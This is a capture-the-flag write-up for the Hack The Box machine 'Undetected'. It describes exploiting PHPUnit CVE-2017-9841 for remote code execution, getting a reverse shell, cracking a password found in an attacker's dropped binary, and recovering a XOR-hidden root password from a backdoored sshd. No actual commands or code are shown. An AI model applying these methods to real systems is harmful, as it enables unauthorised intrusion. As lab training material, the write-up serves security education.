Undetected - [HTB]

Cover Image for Undetected - [HTB]
Marmeus
Marmeus

Introduction

Undetected is a machine where we must follow the evidence left by the attacker when doing with the jewellery shop server. We will have to enumerate the web frameworks to exploit the vulnerability CVE-2017-9841; then we will have to do some reversing to a binary left by the attacker in order to obtain the users' password. Finally, we will have to analyse the sshd binary where the attacker introduced a backdoor to extract the password for becoming root.

Enumeration

As always, let's start finding all opened ports in the machine with Nmap.

Then, we continue with a deeper scan of each opened port, getting more information about each service.

Starting with the web port, we see a jewellery store.

Diana's jewelry

Looking for domains on the HTML code, we can obtain several domains.

Once added the domains to the /etc/hosts file, we can access another jewellery page.

Store diana's jewelery

Enumerating this last page, we can see a /vendor folder with directory listing enabled.

Because it has the directory listing enabled, we can see which plugins the web page uses.

Directory listing

Exploitation

The PHPUnit framework has the vulnerability CVE-2017-9841, which allows the attacker to perform RCE, as you can see below.

In order to obtain a reverse shell, you can execute the command.

Privilege Escalation 1

Once inside the machine, there is a binary file in the /var/backups folder that can only be executed by www-data.

In order to analyse the file, I transferred it to my kali machine.

Executing the strings commands against the file appears a huge hexadecimal string.

After decoding it, we obtain the following command, which inserts a contrab and replaces the password for user steven1.

After breaking the password with john, we can log in as steven1.

Privilege Escalation 2

Inside the /var/mail directory, there is a mail for steven.

Reading the email, we know there is a problem with the apache server.

Enumerating the modules enabled directory, we can see a module whose date differs from the others.

So, we look for the module and transfer it to our machine to analyse it again.

Doing strings to the shared object, we can see a long base64 string.

Once decoded, it turns out to be another command which replaces the sshd binary and changes the file's creation date by the creation date of /usr/sbin/a2enmod.

Analysing the file with Ghydra, we can see an auth_function.

auth_password

This function has hardcoded an encrypted password to get access as root to the machine.

image-20220228165658732

The encryption mechanism is a simple XOR operation with the hex value 96.

After organising the string in a little-endian format, we can decode the password with CyberChef.

Finally, we can become root by doing SSH to de machine.